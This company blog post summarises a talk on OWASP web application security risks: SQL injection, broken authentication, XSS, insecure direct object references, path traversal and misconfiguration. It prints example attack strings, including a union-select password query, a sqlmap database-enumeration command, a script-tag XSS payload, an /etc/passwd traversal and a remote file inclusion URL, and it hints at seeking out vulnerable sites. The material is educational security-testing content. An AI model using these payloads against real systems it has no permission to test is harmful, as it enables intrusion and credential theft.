Mantra Labs organized a conference at their Bangalore office, where their seasoned Test Engineer Rijin Raj discussed the current top 10 web application security risks in the evolving digital world. He elaborated on vulnerabilities with examples and offered suggestions to avoid them.
The Open Web Application Security Project (OWASP) is an international organization for enhancing the security of web applications. The top 10 web application security risks worldwide are:
In the second part of this series, we will cover the following web application security testing parameters:
To get an idea about how hackers are exploiting web applications and prevailing security/penetration bugs, you can go through the exploit database’s list. Now let’s delve deep into the risks and web application security testing measures.
Here, an attacker sends rogue content to a web application interpreter resulting in executing authorized commands. The most common forms of code injection attacks are SQL Injection ( or SQLi). An SQLi attack sends malformed code into the database server, leading to exposure of your data. This style of attack is so simple that anyone with access to the internet can do it. In fact, SQLi scripts are available for download.
The attacker enters characters — “” into the search field and presses the button. It leads to an error page that displays more information than required. The following example shows a badly and insecurely programmed application that is not capable of handling SQL Injections.
Just a few illegal characters with a little sniffing around leads the hacker to this string: “‘ union select password from users;”. He can then implement this finding to harvest usernames and passwords from the database. This is just one basic way to exploit application databases.
SQLmap: It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking-over of database servers. It is commonly used in Kali-linux.
After finding a vulnerable page you can find database by typing:
sqlmap –u (url) –dbs
Tip: You can use the Hackers Arise guide on how to use SQLmap.
For web application security testing practice, you can use the following websites:
You can also find SQL vulnerable websites on your own. You just have to look for:
Also, go through these examples of SQLi attacks: blind SQL Injection attack, SQL Injection vulnerability.
Incorrect implementation of authentication schemes and session management can allow unauthorized users to assume identities of valid users.
Broken Authentication and Session Management attacks are anonymous attacks with an intention to try and retrieve passwords, user account information, IDs and other details.
Key Points to check if you are vulnerable:
Scenario #1
Airline reservations application supports URL rewriting, putting session IDs in the URL.
http://example.com/sale/saleitems?sessionid=268544541&dest=Hawaii
An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.
Scenario #2
An application’s timeouts aren’t set properly. A User uses a public computer to access a site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
Scenario #3
Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every users’ password to the attacker.
Password strength:
Password use:
Password change controls:
Password storage:
Session ID protection:
Browser caching:
Also, refer to these examples of broken authentication and session management: Bad 2FA activation flow, Coursera application loophole.
This happens when a browser unknowingly executes scripts to hijack sessions or redirect to a rogue site.
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application uses unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, he exploits a vulnerability within a website or web application that the victim would visit; essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser. There are basically two types of XSS:
You can determine if a web-based application is vulnerable to XSS attacks very easily. Take a current parameter that is sent in the HTTP GET request and modify it. Take for example the following request in the browser address URL bar. This url will take a name parameter that you enter in a textbox and print something on the page. Like “Hello George, thank you for coming to my site” http://www.yoursite.com/index.html?name=george
Now, modify it so as to add an additional information to the parameter. For example try entering something similar to the following request in the browser address URL bar.
http://www.yoursite.com/index.html?name=<script>alert(‘You just found a XSS vulnerability’)</script>
If this pops up an alert message box stating “You just found a XSS vulnerability”, then you know this parameter is vulnerable to XSS attacks. I.e. you’ve not validated the parameter name and it is allowing anything to be processed as a name, including a malicious script that is injected into the parameter passed in.
Basically what is occurring is normally where the name George would be entered on the page the </script></script> message is instead being written to the dynamic page.
More on XSS vulnerability and examples — hackersonlineclub.com
You can use Zaproxy, a freeware tool for web application security testing. Also, you can use Burp Suite and Beef for XSS vulnerability testing.
An attacker can access a reference to a file or directory and manipulate that reference to gain unauthorized access to other objects (unless an access control check is in place).
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter.
For this category of web application security testing, a Tester first needs to map out all locations in the application where user input is used to reference objects directly (e.g. database rows, files, application pages, etc.). Next, the tester should modify the parameter value for reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.
The best way to test insecure direct object references is — take at least two users to cover different owned objects and functions. For example, take two users with each having access to different objects (such as purchase information, private messages, etc.), and (if relevant) users with different privileges (for example administrator users). Now see whether there are direct references to application functionality. By having multiple users the tester can save valuable testing time in guessing different object names as he can attempt to access objects that belong to the other user.
The value of a parameter directly retrieves a database record.
Sample request: http://foo.bar/somepage?invoice=12345
You can refer to these reported cases — deleting a member of any organization, reset password.
Many web applications use and manage files as part of their daily operation. Using poorly designed/deployed input validation methods, an aggressor can exploit the system in order to read or write private files.
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. Here are some examples of the checks to be performed at this stage:
Consider the following strings-
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
An attacker can insert the malicious string “../../../../etc/passwd” to include the password hash file of a Linux/UNIX system. This kind of attack is possible only if the validation checkpoint fails. According to the file system privileges, the web application itself must be able to read the file.
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
It is also possible to include files and scripts from external websites.
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
While accepting protocols as arguments, as in the above example, it’s also possible to-
Refer to this example of path traversal — Full Path Disclosure by removing CSRF token
Improper server or web application configuration leads to various flaws.
It’s better to check if your application is missing the proper security hardening across every part of the application stack including-
Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Here, the attacker can discover standard admin pages on your server, logs in with default passwords, and take over.
Scenario #2: Directory listing is not disabled on your web server. An attacker can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker, thus, finds a serious access control flaw in your application.
Scenario #3: App server configuration allows returning stack traces to users, potentially exposing underlying flaws such as framework versions that are highly vulnerable.
Scenario #4: App server comes with sample applications that are not usually removed from your production server. These sample applications have well known security flaws that attackers can use to compromise your server.
Follow these 8 measures to protect your application against security misconfiguration attacks.
Also read – Security Misconfiguration: Hardening your ASP.NET App
We’ll discuss the remaining 5 web application security risks and testing for vulnerability in the part 2 of this series.
About the author: Rijin Raj is a Senior Software Engineer-QA at Mantra Labs, Bangalore. He is a seasoned tester and backbone of the organization with non-compromising attention to details.
Related:
In 1997, the world watched in awe as IBM’s Deep Blue, a machine designed to…
As healthcare becomes more patient-centric, the demand for efficient and personalized care continues to grow.…
Imagine waking up to an assistant who has already planned your day—rescheduled your meetings to…
When we hear million-dollar AI mistakes, the first thought is: What could it be? Was…
Let’s take a trip back in time—2008. Netflix was nothing like the media juggernaut it…
Ever wondered what life would be like if the Sun took a day off? Picture…
This website uses cookies.